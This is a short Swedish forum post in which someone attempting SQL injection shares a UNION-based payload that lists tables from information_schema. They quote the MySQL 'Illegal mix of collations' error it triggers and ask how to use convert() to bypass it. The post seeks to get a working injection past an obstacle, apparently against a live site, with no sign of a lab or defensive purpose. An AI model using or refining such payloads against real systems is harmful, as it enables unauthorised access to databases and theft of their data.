nar jag forsoker injecta:
Kod:
union all select 1,2,table_name,4,5 from information_schema.tables/*
sa far jag foljande felmeddelande:
Kod:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
antar att man ska andvanda convert() pa natt smidigt satt men jag far inte till det?